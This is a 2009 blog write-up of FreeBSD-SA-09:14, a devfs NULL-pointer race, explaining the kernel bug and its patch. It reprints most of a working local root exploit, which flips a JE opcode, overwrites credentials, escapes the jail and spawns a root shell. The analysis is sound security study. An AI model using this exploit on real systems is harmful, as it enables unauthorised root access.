xorl %eax, %eax

FreeBSD-SA-09:14: Devfs/VFS NULL Pointer Race Condition


This is a recently disclosed vulnerability, discovered by Polish researcher Przemyslaw Frasunek. The issue affects FreeBSD 6.x as well as 7.x releases and is located in sys/fs/devfs/devfs_vnops.c, which was written by the famous Poul-Henning Kamp and contains the VNOP functions for the devfs filesystem. Here is the vulnerable code from the 7.2 release of FreeBSD:

static int
devfs_fp_check(struct file *fp, struct cdev **devp, struct cdevsw **dswp)
{

         *dswp = devvn_refthread(fp->f_vnode, devp);
         if (*devp != fp->f_data) {
                 if (*dswp != NULL)
                         dev_relthread(*devp);
                 return (ENXIO);
         }
         KASSERT((*devp)->si_refcount > 0,
             ("devfs: un-referenced struct cdev *(%s)", devtoname(*devp)));
         if (*dswp == NULL)
                 return (ENXIO);
         curthread->td_fpop = fp;
         return (0);
}

P. Frasunek noticed that in devfs_open() of the same file, ‘fp->f_vnode’ is not initialized and thus remains zero during the execution of the above code. This routine uses devvn_refthread() to initialize the ‘dswp’ pointer. Then, if ‘*devp’ (the device obtained from the vnode) does not match ‘fp->f_data’, it releases the thread reference using ‘dev_relthread()’ (only when ‘*dswp’ isn’t NULL) and returns ENXIO (aka. Device not configured). Otherwise, it asserts that ‘(*devp)->si_refcount’ (which contains the number of references to that structure) is greater than zero, and if ‘*dswp’ is NULL, it immediately returns ENXIO. In any other case, it sets ‘curthread->td_fpop’ to ‘fp’. curthread is read from FS:[0] (on IA-32) or GS:[0] (on x86_64), where the kernel keeps the pointer to the currently executing thread’s structure (aka. struct thread), and ‘td_fpop’, as we can read in sys/proc.h, contains the file referencing the cdev under op.
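To make the control flow easier to follow, here is a small userland model of the check described above. It is only a sketch: the ‘model_*’ structures and functions are made up for illustration and are not the kernel’s definitions. The point it shows is that the failure path undoes the reference it just took.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Hypothetical, simplified stand-ins for the kernel structures. */
struct model_cdev {
    unsigned long si_threadcount;   /* threads currently inside the driver */
    int has_devsw;                  /* non-zero models a non-NULL si_devsw */
};

struct model_file {
    struct model_cdev *vnode_dev;   /* models fp->f_vnode->v_rdev */
    struct model_cdev *f_data;      /* models fp->f_data */
};

/* Models devvn_refthread(): take a thread reference if a driver exists. */
int model_refthread(struct model_cdev *dev)
{
    if (dev != NULL && dev->has_devsw) {
        dev->si_threadcount++;
        return 1;
    }
    return 0;
}

/* Models devfs_fp_check(): 0 on success, ENXIO on either failure path. */
int model_fp_check(struct model_file *fp)
{
    struct model_cdev *dev = fp->vnode_dev;
    int have_dsw = model_refthread(dev);

    if (dev != fp->f_data) {
        if (have_dsw)
            dev->si_threadcount--;  /* models dev_relthread() */
        return ENXIO;
    }
    if (!have_dsw)
        return ENXIO;
    return 0;
}
```

On the mismatch path the counter is incremented and then decremented again, so the net effect is zero; only the success path keeps the reference.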
Now, a closer look at dev_relthread(), which devfs_fp_check() calls before returning ENXIO when ‘*dswp’ isn’t NULL. It can be found in kern/kern_conf.c and does this:

dev_relthread(struct cdev *dev)
{
         mtx_assert(&devmtx, MA_NOTOWNED);
         dev_lock();
         KASSERT(dev->si_threadcount > 0, ("%s threadcount is wrong", dev->si_name));
         dev->si_threadcount--;
         dev_unlock();
}

Basically, it simply decrements the device’s thread counter (‘si_threadcount’) by one while holding the device lock. The second routine called in devfs_fp_check() is devvn_refthread(), which is used to initialize the ‘dswp’ pointer. This is probably the most interesting one…

struct cdevsw *
devvn_refthread(struct vnode *vp, struct cdev **devp)
{
         struct cdevsw *csw;
         struct cdev_priv *cdp;

         mtx_assert(&devmtx, MA_NOTOWNED);
         csw = NULL;
         dev_lock();
         *devp = vp->v_rdev;
         if (*devp != NULL) {
                 cdp = (*devp)->si_priv;
                 if ((cdp->cdp_flags & CDP_SCHED_DTR) == 0) {
                         csw = (*devp)->si_devsw;
                         if (csw != NULL)
                                 (*devp)->si_threadcount++;
                 }
         }
         dev_unlock();
         return (csw);
}

It takes a vnode and a pointer to a cdev pointer as arguments and, after a simple assertion, it locks the device and sets the device pointer to ‘vp->v_rdev’. Since ‘fp->f_vnode’ was not properly initialized in devfs_open() and is used directly as the first argument of devvn_refthread(), this results in a NULL pointer dereference: ‘*devp’ is loaded from NULL->v_rdev which, as P. Frasunek discovered, is address 0x1c. Next, if ‘*devp’ isn’t NULL (which is our case), it initializes ‘cdp’ with ‘(*devp)->si_priv’ and checks the CDP_SCHED_DTR flag; if that flag is not set, it initializes ‘csw’ to ‘(*devp)->si_devsw’. At last, if ‘csw’ is not NULL, it increments ‘(*devp)->si_threadcount’.
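Why does a NULL vnode end up reading address 0x1c? A member access through a pointer is just the pointer’s value plus the member’s offset. The sketch below assumes a hypothetical 32-bit layout (‘struct model_vnode’ is made up, with padding chosen only to reproduce the 0x1c offset quoted in the exploit’s comments); it is not the real struct vnode.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical 32-bit layout: the padding size is chosen only so that
 * v_rdev lands at 0x1c, the offset quoted in the exploit's comments.
 * Pointers are modelled as uint32_t to mimic IA-32.
 */
struct model_vnode {
    uint8_t  pad[0x1c];
    uint32_t v_rdev;
};

/* Address the CPU would read for vp->v_rdev, given vp's numeric value. */
uintptr_t v_rdev_address(uintptr_t vp)
{
    return vp + offsetof(struct model_vnode, v_rdev);
}
```

With ‘vp’ equal to zero the function returns 0x1c, which is why whoever controls the first page of the address space controls what the kernel takes as the device pointer.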
This final operation allows the modification of an arbitrary user-controlled location, but unfortunately the value is restored by the decrement that dev_relthread() performs when called in devfs_fp_check(). Nevertheless, P. Frasunek managed to write a really awesome exploit for this vulnerability. Before moving on to the analysis of his exploit code, here is how it was patched by the FreeBSD guys:

 		fp->f_data = dev;
+		fp->f_vnode = vp;

A simple initialization of ‘fp->f_vnode’ in devfs_open() was enough.
Now, to the exploit code…

int main(void) {
	int i;
	pthread_t pth, pth2;
	struct cdev devp;
	char *p;
	unsigned long *ap;

	/* 0x1c used for vp->v_rdev dereference, when vp=0 */
	/* 0xa5610e8 used for vp->r_dev->si_priv dereference */
	/* 0x37e3e1c is junk dsw->d_kqfilter() in devfs_vnops.c:650 */

	unsigned long pages[] = { 0x0, 0xa561000, 0x37e3000 };
	unsigned long sizes[] = { 0xf000, 0x1000, 0x1000 }; 

His comments are really useful here. The two arrays contain the page addresses and their corresponding sizes, which are described in the comments. The code continues with:

	for (i = 0; i < sizeof(pages) / sizeof(unsigned long); i++) {
		printf("[*] allocating %p @ %p\n", sizes[i], pages[i]);
		if (mmap((void *)pages[i], sizes[i], PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) == MAP_FAILED) {
			return -1;
		}
	}

This loop maps the pages listed in ‘pages[]’, with their corresponding ‘sizes[]’, using the mmap(2) system call. The next part of main() is…
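For readers who haven’t used mmap(2) this way, here is a minimal sketch of the same call pattern with the MAP_FAILED check. It is deliberately tamer than the exploit’s loop: ‘map_scratch’ is a hypothetical helper, it lets the kernel pick the address (no MAP_FIXED) and it does not ask for PROT_EXEC.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* exposes MAP_ANON on glibc */
#endif
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/mman.h>

/*
 * Maps `len` bytes of zero-filled anonymous memory at a kernel-chosen
 * address. Returns NULL (after reporting the error) on failure.
 * Note: no MAP_FIXED and no PROT_EXEC here; the exploit uses both.
 */
void *map_scratch(size_t len)
{
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_ANON | MAP_PRIVATE, -1, 0);
    if (p == MAP_FAILED) {
        perror("mmap");
        return NULL;
    }
    return p;
}
```

The important detail is that mmap() reports failure with MAP_FAILED rather than NULL, which matters here because address zero is exactly one of the pages the exploit asks for.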

#define JE_ADDRESS 0xc076c62b

/* location of "je" (0x74) opcode in devfs_fp_check() - it will be incremented
 * becoming "jne" (0x75), so error won't be returned in devfs_vnops.c:648
 * and junk function pointer will be called in devfs_vnops.c:650
 * you can obtain it using:
 * $ objdump -d /boot/kernel/kernel | grep -A 50 \<devfs_fp_check\>: | grep je | head -n 1 | cut -d: -f1
 */

	*(unsigned long *)0x1c = (unsigned long)(JE_ADDRESS - ((char *)&devp.si_threadcount - (char *)&devp));

	p = (char *)pages[2];
	ap = (unsigned long *)p;

	for (i = 0; i < sizes[2] / 4; i++)
		*ap++ = (unsigned long)&kernel_code;

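So, he’s using a JE instruction in devfs_fp_check() as the target of the increment/decrement race: the word at 0x1c (the NULL->v_rdev slot) is set so that the ‘si_threadcount’ field of the fake device lies exactly at JE_ADDRESS. ‘ap’ is initialized to point to ‘pages[2]’, the page from which the junk ‘dsw->d_kqfilter()’ pointer is read. Every word of that page is filled with the address of kernel_code(), which is this: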
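Both preparations in this part of main() can be modelled in userland. The sketch below is an illustration under assumptions: ‘struct model_cdev_layout’ is a made-up layout (only the idea of subtracting the field offset matters), and ‘model_handler’ stands in for kernel_code().

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for struct cdev; only the field offset matters. */
struct model_cdev_layout {
    uint32_t other[4];
    uint32_t si_threadcount;
};

/* Fake device base that makes &dev->si_threadcount equal `target`. */
uintptr_t fake_dev_base(uintptr_t target)
{
    return target - offsetof(struct model_cdev_layout, si_threadcount);
}

typedef void (*handler_fn)(void);

static int handler_calls;

/* Stand-in for kernel_code(): only records that it ran. */
void model_handler(void)
{
    handler_calls++;
}

/* Stores the same handler in every slot, like the exploit's fill loop. */
void fill_page(handler_fn *page, size_t slots)
{
    for (size_t i = 0; i < slots; i++)
        page[i] = model_handler;
}

/* Calls through one slot and returns how many times the handler has run. */
int call_slot(handler_fn *page, size_t slot)
{
    page[slot]();
    return handler_calls;
}
```

Filling the whole page means the exact slot the kernel reads doesn’t have to be known precisely: any aligned pointer read from that page lands on the same handler.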

static void kernel_code(void) {
	struct thread *thread;
	gotroot = 1;
	asm(
		"movl %%fs:0, %0"
		: "=r"(thread)
	);
	thread->td_proc->p_ucred->cr_uid = 0;
	thread->td_proc->p_ucred->cr_prison = NULL;
}


It retrieves the current thread structure on IA-32 systems (on x86_64 he would have to use %%gs:0), sets the UID in the current process’s credentials to that of root (aka. 0), and sets the pointer to a possible jail the process is running in to NULL, in order to escape from a jail environment.
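The pointer chain that kernel_code() walks is easier to see on a toy model. The ‘model_*’ structures below are hypothetical, trimmed-down stand-ins that keep only the fields mentioned above; they are not the kernel’s definitions and nothing here touches real credentials.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, trimmed-down versions of the kernel structures. */
struct model_prison { int pr_id; };
struct model_ucred  { unsigned int cr_uid; struct model_prison *cr_prison; };
struct model_proc   { struct model_ucred *p_ucred; };
struct model_thread { struct model_proc *td_proc; };

/* Same two stores as kernel_code(), applied to the userland model. */
void model_kernel_code(struct model_thread *td)
{
    td->td_proc->p_ucred->cr_uid = 0;        /* UID of root */
    td->td_proc->p_ucred->cr_prison = NULL;  /* no jail attached */
}
```

Note that the credentials hang off the process, not the thread, which is why the thread pointer is only the starting point of the walk.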
Back to main() we have…

	if ((kq = kqueue()) < 0) {
		return -1;
	}

	pthread_create(&pth, NULL, (void *)do_thread, NULL);
	pthread_create(&pth2, NULL, (void *)do_thread2, NULL);

	timeout.tv_sec = 0;
	timeout.tv_nsec = 1;

	printf("waiting for root...\n");
	i = 0;

	while (!gotroot && i++ < 10000)
		usleep(100);

He initializes ‘kq’ using the kqueue() system call and creates two threads that execute do_thread() and do_thread2() respectively. Then he initializes a timespec structure and finally runs a simple sleeping loop, waiting for the threads to gain execution in kernel context. Here is the code of do_thread():

void do_thread(void) {

	while (!gotroot) {
		memset(&kev, 0, sizeof(kev));
		EV_SET(&kev, fd, EVFILT_READ, EV_ADD, 0, 0, NULL);

		if (kevent(kq, &kev, 1, &ke, 1, &timeout) < 0)
			perror("kevent");
	}
}

As long as it has not gained root access, it initializes a kevent structure using the EV_SET() macro, with ‘fd’ as the identifier, an EVFILT_READ filter (which triggers when there is data available to read from ‘fd’) and EV_ADD to add the event to the kqueue. Finally, it invokes kevent() to register that event.
Now, do_thread2() goes like this:

void do_thread2(void) {
	while(!gotroot) {
		/* any devfs node will work */
		if ((fd = open("/dev/null", O_RDONLY, 0600)) < 0)
			perror("open");

		close(fd);
	}
}

While it has not gained root access, it opens a device, storing the descriptor in ‘fd’, and then closes it. Finally, the last part of the main() routine is:


	if (getuid()) {
		printf("failed - system patched or not MP\n");
		return -1;
	}

	execl("/bin/sh", "sh", NULL);

	return 0;
}

So, if it is able to set its UID to 0 it will spawn a shell which would be a root-shell. :)
The goal of this exploit code is to follow these steps:
1) Point the increment at the JE instruction of devfs_fp_check()
2) Open a device to trigger the increment. This turns the JE (which is 0x74) into a JNE (which is 0x75), which results in the invocation of dsw->d_kqfilter() as we can see here:

static int
devfs_kqfilter_f(struct file *fp, struct knote *kn)
{
         struct cdev *dev;
         struct cdevsw *dsw;
         int error;
         struct file *fpop;
         struct thread *td;

         td = curthread;
         fpop = td->td_fpop;
         error = devfs_fp_check(fp, &dev, &dsw);
         if (error)
                return (error);
         error = dsw->d_kqfilter(dev, kn);
         td->td_fpop = fpop;
         dev_relthread(dev);
         return (error);
}

Here, with the JE in devfs_fp_check() flipped, no error reaches the if (error) check, so execution falls through to the dsw->d_kqfilter() call.

3) The kernel jumps through dsw->d_kqfilter(), which now leads to kernel_code(), resulting in privilege escalation and a possible jail escape.

By doing so, P. Frasunek avoids the dev_relthread() (the decrement) in devfs_kqfilter_f(), as you can clearly see. The two threads are used to hit the race window between the increment and the decrement: one calls kevent() on ‘fd’ while the other keeps opening and closing ‘fd’.
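The race window itself can be replayed deterministically. The sketch below is a single-threaded model, not real concurrency: one "thread" performs the increment followed by the decrement, and ‘observed_value’ (a hypothetical helper) returns what a second thread would read at each of the three possible positions.

```c
#include <assert.h>

/* Position of the observing thread relative to the other thread's steps. */
enum observe_at { BEFORE_INC = 0, BETWEEN = 1, AFTER_DEC = 2 };

/*
 * Replays one interleaving: one thread does counter++ then counter--,
 * while a second thread reads the counter once at the given position.
 * Returns the value the second thread sees.
 */
unsigned char observed_value(unsigned char initial, enum observe_at when)
{
    unsigned char counter = initial;
    unsigned char seen = counter;      /* BEFORE_INC */

    counter++;                         /* models si_threadcount++ */
    if (when == BETWEEN)
        seen = counter;
    counter--;                         /* models dev_relthread() */
    if (when == AFTER_DEC)
        seen = counter;
    return seen;
}
```

Starting from 0x74, only the BETWEEN position sees 0x75; in the other two the byte still reads 0x74. That narrow middle position is why the exploit loops in two threads (and why its failure message mentions a non-MP system) instead of trying once.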

Written by xorl

October 13, 2009 at 23:17

4 Responses


  1. nice u r back ;)


    October 14, 2009 at 07:39

  2. nice to see new posts :)


    October 14, 2009 at 22:33

  3. nice to see you back


    October 15, 2009 at 11:43

  4. nice to see you, to see you, nice!


    October 21, 2009 at 16:48
